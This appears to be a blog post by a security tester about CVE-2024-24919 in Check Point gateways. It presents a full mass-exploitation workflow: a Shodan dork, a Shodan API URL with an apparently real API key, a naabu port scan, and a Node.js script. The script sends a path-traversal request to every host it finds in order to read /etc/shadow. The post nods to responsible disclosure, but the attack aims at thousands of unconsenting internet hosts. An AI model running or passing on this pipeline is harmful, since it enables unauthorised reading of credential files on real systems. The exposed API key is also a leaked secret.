How to test for CVE-2024-24919
Please ensure that testing for these types of issues is conducted responsibly, and assist companies in addressing and resolving their security vulnerabilities.
What is CVE-2024-24919?
CVE-2024-24919 is a high-severity vulnerability affecting Check Point Security Gateways, particularly those configured with remote Access VPN or Mobile Access Software Blades. This vulnerability allows an attacker to potentially read certain information on the affected gateways if they are connected to the internet. Exploiting this flaw could lead to information disclosure, which can be critical depending on the nature of the information accessed.
Check Point has released a security fix to mitigate this vulnerability, and users are strongly encouraged to apply this update to protect their systems (Tenable®) (MitreCVE).
The vulnerability has been actively exploited in the wild, making it crucial for administrators to address it promptly to prevent unauthorized access and potential data breaches (Tenable®). For more details and to access the security patch, you can visit the official Check Point support page (MitreCVE).
We are making use of shodan with the below Dork to see the vulnerable host
Just type in shodan - "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
1. Check Point Software**:**
The "Server: Check Point SVN" part identifies the server software as Check Point SVN foundation, which is likely used for internal version control within Check Point.
2. Compatibility Mode:
The "X-UA-Compatible: IE=EmulateIE7" part suggests the server is configured to render webpages in a way compatible with Internet Explorer 7, an older web browser. This could be because the server itself is older or might be serving a specific application that relies on older functionalities.
Results in shodan
You can see more than 30,000 results.
Writing a script to fetch all the hosts, for this you can use the Shodan API -
https://api.shodan.io/shodan/host/search?key=2l8Hfa0EBAGYY0DN4oFFD9Yr2kuHyfwa&query={query}&facets={facets}
Now once you have all the host names filtered from the Shodan results. use Naabu to run scans on ports.
naabu -list 1.txt -p 1-65535 -o naabu_output.txt
Now use the below script to run a curl command against all the endpoints and check the results.
const { exec } = require('child_process');
const fs = require('fs');
// Create a write stream to a .txt file
const outputStream = fs.createWriteStream('output.txt', { flags: 'a' }); // 'a' flag for append mode
// Function to execute curl command for a given IP address
function executeCurl(ip) {
const curlCommand = `curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: ${ip}' -H $'Content-Length: 39' -H $'Connection: keep-alive' \
--data-binary $'aCSHELL/../../../../../../../etc/shadow' \
$'https://${ip}/clients/MyCRL'`;
exec(curlCommand, (error, stdout, stderr) => {
if (error) {
console.error(`Error executing curl for IP ${ip}: ${error.message}`);
return;
}
if (stderr) {
console.error(`stderr executing curl for IP ${ip}: ${stderr}`);
return;
}
const output = `Response for IP ${ip}:\n${stdout}`;
console.log(output);
outputStream.write(output + '\n'); // Write output to the file
});
}
// Read IP addresses from naabu_output.txt and execute curl command for each
fs.readFile('naabu_output1.txt', 'utf8', (err, data) => {
if (err) {
console.error(`Error reading file: ${err}`);
return;
}
const ips = data.trim().split('\n');
ips.forEach(ip => {
executeCurl(ip);
});
});
Fire up Burp and reproduce the automated finding
Alternatively, you can also use the Nuclei template.
Make sure you are responsibly disclosing these issues to the Organization and make sure to give a tweet
Robin Joseph
Head of Security testing